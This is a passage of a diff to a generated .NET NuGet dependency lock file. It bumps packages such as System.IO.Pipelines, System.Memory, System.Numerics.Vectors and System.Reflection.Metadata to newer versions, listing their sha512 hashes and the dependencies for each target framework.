"net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "System.IO", "id": "System.IO", "version": "4.3.0", "sha512": "sha512-v8paIePhmGuXZbE9xvvNb4uJ5ME4OFXR1+8la/G/L1GIl2nbU2WFnddgb79kVK3U2us7q1aZT/uY/R0D/ovB5g==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Text.Encoding", "System.Threading.Tasks"], "net6.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Text.Encoding", "System.Threading.Tasks"], "net7.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Text.Encoding", "System.Threading.Tasks"], "net8.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Text.Encoding", "System.Threading.Tasks"], "net9.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Text.Encoding", "System.Threading.Tasks"], "netcoreapp1.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Text.Encoding", "System.Threading.Tasks"], "netcoreapp1.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Text.Encoding", "System.Threading.Tasks"], "netcoreapp2.0": ["Microsoft.NETCore.Platforms", 
"Microsoft.NETCore.Targets", "System.Runtime", "System.Text.Encoding", "System.Threading.Tasks"], "netcoreapp2.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Text.Encoding", "System.Threading.Tasks"], "netcoreapp2.2": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Text.Encoding", "System.Threading.Tasks"], "netcoreapp3.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Text.Encoding", "System.Threading.Tasks"], "netcoreapp3.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Text.Encoding", "System.Threading.Tasks"], "netstandard": [], "netstandard1.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Text.Encoding", "System.Threading.Tasks"], "netstandard1.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Text.Encoding", "System.Threading.Tasks"], "netstandard1.2": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Text.Encoding", "System.Threading.Tasks"], "netstandard1.3": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Text.Encoding", "System.Threading.Tasks"], "netstandard1.4": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Text.Encoding", "System.Threading.Tasks"], "netstandard1.5": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Text.Encoding", "System.Threading.Tasks"], "netstandard1.6": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Text.Encoding", "System.Threading.Tasks"], "netstandard2.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Text.Encoding", "System.Threading.Tasks"], "netstandard2.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", 
"System.Text.Encoding", "System.Threading.Tasks"]}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "System.IO.FileSystem", "id": "System.IO.FileSystem", "version": "4.3.0", "sha512": "sha512-T7WB1vhblSmgkaDpdGM3Uqo55Qsr5sip5eyowrwiXOoHBkzOx3ePd9+Zh97r9NzOwFCxqX7awO6RBxQuao7n7g==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": ["System.IO.FileSystem.Primitives"], "net461": ["System.IO.FileSystem.Primitives"], "net462": ["System.IO.FileSystem.Primitives"], "net47": ["System.IO.FileSystem.Primitives"], "net471": ["System.IO.FileSystem.Primitives"], "net472": ["System.IO.FileSystem.Primitives"], "net48": ["System.IO.FileSystem.Primitives"], "net5.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.IO", "System.IO.FileSystem.Primitives", "System.Runtime", "System.Runtime.Handles", "System.Text.Encoding", "System.Threading.Tasks"], "net6.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.IO", "System.IO.FileSystem.Primitives", "System.Runtime", "System.Runtime.Handles", "System.Text.Encoding", "System.Threading.Tasks"], "net7.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.IO", "System.IO.FileSystem.Primitives", "System.Runtime", "System.Runtime.Handles", "System.Text.Encoding", "System.Threading.Tasks"], "net8.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.IO", "System.IO.FileSystem.Primitives", "System.Runtime", "System.Runtime.Handles", "System.Text.Encoding", "System.Threading.Tasks"], "net9.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.IO", "System.IO.FileSystem.Primitives", "System.Runtime", "System.Runtime.Handles", "System.Text.Encoding", "System.Threading.Tasks"], "netcoreapp1.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.IO", 
"System.IO.FileSystem.Primitives", "System.Runtime", "System.Runtime.Handles", "System.Text.Encoding", "System.Threading.Tasks"], "netcoreapp1.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.IO", "System.IO.FileSystem.Primitives", "System.Runtime", "System.Runtime.Handles", "System.Text.Encoding", "System.Threading.Tasks"], "netcoreapp2.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.IO", "System.IO.FileSystem.Primitives", "System.Runtime", "System.Runtime.Handles", "System.Text.Encoding", "System.Threading.Tasks"], "netcoreapp2.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.IO", "System.IO.FileSystem.Primitives", "System.Runtime", "System.Runtime.Handles", "System.Text.Encoding", "System.Threading.Tasks"], "netcoreapp2.2": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.IO", "System.IO.FileSystem.Primitives", "System.Runtime", "System.Runtime.Handles", "System.Text.Encoding", "System.Threading.Tasks"], "netcoreapp3.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.IO", "System.IO.FileSystem.Primitives", "System.Runtime", "System.Runtime.Handles", "System.Text.Encoding", "System.Threading.Tasks"], "netcoreapp3.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.IO", "System.IO.FileSystem.Primitives", "System.Runtime", "System.Runtime.Handles", "System.Text.Encoding", "System.Threading.Tasks"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.IO", "System.IO.FileSystem.Primitives", "System.Runtime", "System.Runtime.Handles", "System.Text.Encoding", "System.Threading.Tasks"], "netstandard1.4": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.IO", "System.IO.FileSystem.Primitives", "System.Runtime", "System.Runtime.Handles", "System.Text.Encoding", "System.Threading.Tasks"], 
"netstandard1.5": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.IO", "System.IO.FileSystem.Primitives", "System.Runtime", "System.Runtime.Handles", "System.Text.Encoding", "System.Threading.Tasks"], "netstandard1.6": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.IO", "System.IO.FileSystem.Primitives", "System.Runtime", "System.Runtime.Handles", "System.Text.Encoding", "System.Threading.Tasks"], "netstandard2.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.IO", "System.IO.FileSystem.Primitives", "System.Runtime", "System.Runtime.Handles", "System.Text.Encoding", "System.Threading.Tasks"], "netstandard2.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.IO", "System.IO.FileSystem.Primitives", "System.Runtime", "System.Runtime.Handles", "System.Text.Encoding", "System.Threading.Tasks"]}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "System.IO.FileSystem.Primitives", "id": "System.IO.FileSystem.Primitives", "version": "4.3.0", "sha512": "sha512-WIWVPQlYLP/Zc9I6IakpBk1y8ryVGK83MtZx//zGKKi2hvHQWKAB7moRQCOz5Is/wNDksiYpocf3FeA3le6e5Q==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": ["System.Runtime"], "net6.0": ["System.Runtime"], "net7.0": ["System.Runtime"], "net8.0": ["System.Runtime"], "net9.0": ["System.Runtime"], "netcoreapp1.0": ["System.Runtime"], "netcoreapp1.1": ["System.Runtime"], "netcoreapp2.0": ["System.Runtime"], "netcoreapp2.1": ["System.Runtime"], "netcoreapp2.2": ["System.Runtime"], "netcoreapp3.0": ["System.Runtime"], "netcoreapp3.1": ["System.Runtime"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": ["System.Runtime"], "netstandard1.4": 
["System.Runtime"], "netstandard1.5": ["System.Runtime"], "netstandard1.6": ["System.Runtime"], "netstandard2.0": ["System.Runtime"], "netstandard2.1": ["System.Runtime"]}, "targeting_pack_overrides": [], "framework_list": []}, - {"name": "System.IO.Pipelines", "id": "System.IO.Pipelines", "version": "8.0.0", "sha512": "sha512-V+tqEehPQKSLV7HcV4agGqmFISK30VNjSQ2KEsmkWL+ZqN30wMAke+mFWcK0LnaaEL2ixamBdzVITZYNxlLrEg==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["System.Buffers", "System.Memory", "System.Threading.Tasks.Extensions"], "net462": ["System.Buffers", "System.Memory", "System.Threading.Tasks.Extensions"], "net47": ["System.Buffers", "System.Memory", "System.Threading.Tasks.Extensions"], "net471": ["System.Buffers", "System.Memory", "System.Threading.Tasks.Extensions"], "net472": ["System.Buffers", "System.Memory", "System.Threading.Tasks.Extensions"], "net48": ["System.Buffers", "System.Memory", "System.Threading.Tasks.Extensions"], "net5.0": ["System.Buffers", "System.Memory", "System.Threading.Tasks.Extensions"], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["System.Buffers", "System.Memory", "System.Threading.Tasks.Extensions"], "netcoreapp2.1": ["System.Buffers", "System.Memory", "System.Threading.Tasks.Extensions"], "netcoreapp2.2": ["System.Buffers", "System.Memory", "System.Threading.Tasks.Extensions"], "netcoreapp3.0": ["System.Buffers", "System.Memory", "System.Threading.Tasks.Extensions"], "netcoreapp3.1": ["System.Buffers", "System.Memory", "System.Threading.Tasks.Extensions"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["System.Buffers", "System.Memory", 
"System.Threading.Tasks.Extensions"], "netstandard2.1": ["System.Buffers", "System.Memory", "System.Threading.Tasks.Extensions"]}, "targeting_pack_overrides": [], "framework_list": []}, - {"name": "System.Memory", "id": "System.Memory", "version": "4.5.5", "sha512": "sha512-6MjlNsl7lKw0Q8lAsw2tQ89ul9x6jD2Yk3EEj+dOFoYGOE9eAUO9wNhvd4O/n97oQXlkyzqKXXUnE+kLElFy3A==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": ["System.Buffers", "System.Runtime.CompilerServices.Unsafe"], "net451": ["System.Buffers", "System.Runtime.CompilerServices.Unsafe"], "net452": ["System.Buffers", "System.Runtime.CompilerServices.Unsafe"], "net46": ["System.Buffers", "System.Runtime.CompilerServices.Unsafe"], "net461": ["System.Buffers", "System.Numerics.Vectors", "System.Runtime.CompilerServices.Unsafe"], "net462": ["System.Buffers", "System.Numerics.Vectors", "System.Runtime.CompilerServices.Unsafe"], "net47": ["System.Buffers", "System.Numerics.Vectors", "System.Runtime.CompilerServices.Unsafe"], "net471": ["System.Buffers", "System.Numerics.Vectors", "System.Runtime.CompilerServices.Unsafe"], "net472": ["System.Buffers", "System.Numerics.Vectors", "System.Runtime.CompilerServices.Unsafe"], "net48": ["System.Buffers", "System.Numerics.Vectors", "System.Runtime.CompilerServices.Unsafe"], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": ["System.Buffers", "System.Runtime", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp1.1": ["System.Buffers", "System.Runtime", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp2.0": ["System.Runtime.CompilerServices.Unsafe"], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": ["System.Buffers", "System.Runtime", "System.Runtime.CompilerServices.Unsafe"], "netstandard1.2": ["System.Buffers", "System.Runtime", 
"System.Runtime.CompilerServices.Unsafe"], "netstandard1.3": ["System.Buffers", "System.Runtime", "System.Runtime.CompilerServices.Unsafe"], "netstandard1.4": ["System.Buffers", "System.Runtime", "System.Runtime.CompilerServices.Unsafe"], "netstandard1.5": ["System.Buffers", "System.Runtime", "System.Runtime.CompilerServices.Unsafe"], "netstandard1.6": ["System.Buffers", "System.Runtime", "System.Runtime.CompilerServices.Unsafe"], "netstandard2.0": ["System.Buffers", "System.Numerics.Vectors", "System.Runtime.CompilerServices.Unsafe"], "netstandard2.1": ["System.Buffers", "System.Numerics.Vectors", "System.Runtime.CompilerServices.Unsafe"]}, "targeting_pack_overrides": [], "framework_list": []}, + {"name": "System.IO.Pipelines", "id": "System.IO.Pipelines", "version": "9.0.0", "sha512": "sha512-XIeVKR80wuDl05DI4Hufye7TT4D1Ca1Bm4zJPc7mgnodrCy0OfcQ1C00A7se56dMvg48cI64TMD+YKcZl+qOaA==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["System.Buffers", "System.Memory", "System.Threading.Tasks.Extensions"], "net462": ["System.Buffers", "System.Memory", "System.Threading.Tasks.Extensions"], "net47": ["System.Buffers", "System.Memory", "System.Threading.Tasks.Extensions"], "net471": ["System.Buffers", "System.Memory", "System.Threading.Tasks.Extensions"], "net472": ["System.Buffers", "System.Memory", "System.Threading.Tasks.Extensions"], "net48": ["System.Buffers", "System.Memory", "System.Threading.Tasks.Extensions"], "net5.0": ["System.Buffers", "System.Memory", "System.Threading.Tasks.Extensions"], "net6.0": ["System.Buffers", "System.Memory", "System.Threading.Tasks.Extensions"], "net7.0": ["System.Buffers", "System.Memory", "System.Threading.Tasks.Extensions"], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["System.Buffers", "System.Memory", 
"System.Threading.Tasks.Extensions"], "netcoreapp2.1": ["System.Buffers", "System.Memory", "System.Threading.Tasks.Extensions"], "netcoreapp2.2": ["System.Buffers", "System.Memory", "System.Threading.Tasks.Extensions"], "netcoreapp3.0": ["System.Buffers", "System.Memory", "System.Threading.Tasks.Extensions"], "netcoreapp3.1": ["System.Buffers", "System.Memory", "System.Threading.Tasks.Extensions"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["System.Buffers", "System.Memory", "System.Threading.Tasks.Extensions"], "netstandard2.1": ["System.Buffers", "System.Memory", "System.Threading.Tasks.Extensions"]}, "targeting_pack_overrides": [], "framework_list": []}, + {"name": "System.Memory", "id": "System.Memory", "version": "4.6.0", "sha512": "sha512-TY7NpV4Vv0vwanZ6J8vrLGfybbPKhAvL3oTx7EndsZ/J/71sm01JPCHImtvYtwh1vmFat/GPS/id9htqIPK+6g==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["System.Buffers", "System.Numerics.Vectors", "System.Runtime.CompilerServices.Unsafe"], "net462": ["System.Buffers", "System.Numerics.Vectors", "System.Runtime.CompilerServices.Unsafe"], "net47": ["System.Buffers", "System.Numerics.Vectors", "System.Runtime.CompilerServices.Unsafe"], "net471": ["System.Buffers", "System.Numerics.Vectors", "System.Runtime.CompilerServices.Unsafe"], "net472": ["System.Buffers", "System.Numerics.Vectors", "System.Runtime.CompilerServices.Unsafe"], "net48": ["System.Buffers", "System.Numerics.Vectors", "System.Runtime.CompilerServices.Unsafe"], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["System.Buffers", "System.Numerics.Vectors", 
"System.Runtime.CompilerServices.Unsafe"], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["System.Buffers", "System.Numerics.Vectors", "System.Runtime.CompilerServices.Unsafe"], "netstandard2.1": ["System.Buffers", "System.Numerics.Vectors", "System.Runtime.CompilerServices.Unsafe"]}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "System.Net.Primitives", "id": "System.Net.Primitives", "version": "4.3.1", "sha512": "sha512-BgdlyYCI7rrdh36p3lMTqbkvaafPETpB1bk9iQlFdQxYE692kiXvmseXs8ghL+gEgQF2xgDc8GH4QLkSgUUs+Q==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Runtime.Handles"], "net6.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Runtime.Handles"], "net7.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Runtime.Handles"], "net8.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Runtime.Handles"], "net9.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Runtime.Handles"], "netcoreapp1.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Runtime.Handles"], "netcoreapp1.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Runtime.Handles"], "netcoreapp2.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Runtime.Handles"], 
"netcoreapp2.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Runtime.Handles"], "netcoreapp2.2": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Runtime.Handles"], "netcoreapp3.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Runtime.Handles"], "netcoreapp3.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Runtime.Handles"], "netstandard": [], "netstandard1.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netstandard1.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netstandard1.2": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netstandard1.3": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Runtime.Handles"], "netstandard1.4": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Runtime.Handles"], "netstandard1.5": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Runtime.Handles"], "netstandard1.6": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Runtime.Handles"], "netstandard2.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Runtime.Handles"], "netstandard2.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime", "System.Runtime.Handles"]}, "targeting_pack_overrides": [], "framework_list": []}, - {"name": "System.Numerics.Vectors", "id": "System.Numerics.Vectors", "version": "4.5.0", "sha512": "sha512-nATsBTD2CKr4AYN6eRszhX4sptImWmBJwB/U6XKCWWfnCcrTBw8XSCm3QA9gjppkHTr8OkXUY21MR91D3QZXsw==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], 
"net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, - {"name": "System.Reflection.Metadata", "id": "System.Reflection.Metadata", "version": "8.0.0", "sha512": "sha512-+6sMdkJjee0B6nm3AlBBl7cQaI0oPniLvvkrkFhmEN3fo/hGONaFdwpAaO+GRTlbZe4kRZzFwU7kSXQW0RyJxg==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["System.Collections.Immutable", "System.Memory"], "net462": ["System.Collections.Immutable", "System.Memory"], "net47": ["System.Collections.Immutable", "System.Memory"], "net471": ["System.Collections.Immutable", "System.Memory"], "net472": ["System.Collections.Immutable", "System.Memory"], "net48": ["System.Collections.Immutable", "System.Memory"], "net5.0": ["System.Collections.Immutable", "System.Memory"], "net6.0": ["System.Collections.Immutable"], "net7.0": ["System.Collections.Immutable"], "net8.0": ["System.Collections.Immutable"], "net9.0": ["System.Collections.Immutable"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["System.Collections.Immutable", "System.Memory"], "netcoreapp2.1": ["System.Collections.Immutable", "System.Memory"], "netcoreapp2.2": ["System.Collections.Immutable", "System.Memory"], "netcoreapp3.0": ["System.Collections.Immutable", "System.Memory"], "netcoreapp3.1": ["System.Collections.Immutable", "System.Memory"], "netstandard": [], 
"netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["System.Collections.Immutable", "System.Memory"], "netstandard2.1": ["System.Collections.Immutable", "System.Memory"]}, "targeting_pack_overrides": [], "framework_list": []}, - {"name": "System.Reflection.MetadataLoadContext", "id": "System.Reflection.MetadataLoadContext", "version": "8.0.0", "sha512": "sha512-vfR5BfUXXy3amp5aDoOTwOt9BJ8CtplaAnEKHbeTbmMW1SJMrSdviTVVRNqDB0eB9o1j/26WD1VA8JGFfr8t+Q==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["System.Collections.Immutable", "System.Reflection.Metadata", "System.Memory"], "net462": ["System.Collections.Immutable", "System.Reflection.Metadata", "System.Memory"], "net47": ["System.Collections.Immutable", "System.Reflection.Metadata", "System.Memory"], "net471": ["System.Collections.Immutable", "System.Reflection.Metadata", "System.Memory"], "net472": ["System.Collections.Immutable", "System.Reflection.Metadata", "System.Memory"], "net48": ["System.Collections.Immutable", "System.Reflection.Metadata", "System.Memory"], "net5.0": ["System.Collections.Immutable", "System.Reflection.Metadata", "System.Memory"], "net6.0": ["System.Collections.Immutable", "System.Reflection.Metadata"], "net7.0": ["System.Collections.Immutable", "System.Reflection.Metadata"], "net8.0": ["System.Collections.Immutable", "System.Reflection.Metadata"], "net9.0": ["System.Collections.Immutable", "System.Reflection.Metadata"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["System.Collections.Immutable", "System.Reflection.Metadata", "System.Memory"], "netcoreapp2.1": ["System.Collections.Immutable", "System.Reflection.Metadata", "System.Memory"], "netcoreapp2.2": ["System.Collections.Immutable", 
"System.Reflection.Metadata", "System.Memory"], "netcoreapp3.0": ["System.Collections.Immutable", "System.Reflection.Metadata", "System.Memory"], "netcoreapp3.1": ["System.Collections.Immutable", "System.Reflection.Metadata", "System.Memory"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["System.Collections.Immutable", "System.Reflection.Metadata", "System.Memory"], "netstandard2.1": ["System.Collections.Immutable", "System.Reflection.Metadata", "System.Memory"]}, "targeting_pack_overrides": [], "framework_list": []}, + {"name": "System.Numerics.Vectors", "id": "System.Numerics.Vectors", "version": "4.6.0", "sha512": "sha512-dxZWbnnb21+5QuKAiUEntJirh5KiU1nqlLWtBu4v9/Fx1RnsgNn8T4XbmQhvCq/T94201P6EsGG2z2Y5ded1yA==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, + {"name": "System.Reflection.Metadata", "id": "System.Reflection.Metadata", "version": "9.0.0", "sha512": "sha512-jz+Y2m/CpdPvdjCNRigiWJYKFusdkfJlxDx4V5cWX2TubAMaz5CZpODBD/P2+20SpWvmZG6J3UYjl+R2Yg7yFw==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], 
"net45": [], "net451": [], "net452": [], "net46": [], "net461": ["System.Collections.Immutable", "System.Memory"], "net462": ["System.Collections.Immutable", "System.Memory"], "net47": ["System.Collections.Immutable", "System.Memory"], "net471": ["System.Collections.Immutable", "System.Memory"], "net472": ["System.Collections.Immutable", "System.Memory"], "net48": ["System.Collections.Immutable", "System.Memory"], "net5.0": ["System.Collections.Immutable", "System.Memory"], "net6.0": ["System.Collections.Immutable", "System.Memory"], "net7.0": ["System.Collections.Immutable", "System.Memory"], "net8.0": ["System.Collections.Immutable"], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["System.Collections.Immutable", "System.Memory"], "netcoreapp2.1": ["System.Collections.Immutable", "System.Memory"], "netcoreapp2.2": ["System.Collections.Immutable", "System.Memory"], "netcoreapp3.0": ["System.Collections.Immutable", "System.Memory"], "netcoreapp3.1": ["System.Collections.Immutable", "System.Memory"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["System.Collections.Immutable", "System.Memory"], "netstandard2.1": ["System.Collections.Immutable", "System.Memory"]}, "targeting_pack_overrides": [], "framework_list": []}, + {"name": "System.Reflection.MetadataLoadContext", "id": "System.Reflection.MetadataLoadContext", "version": "9.0.0", "sha512": 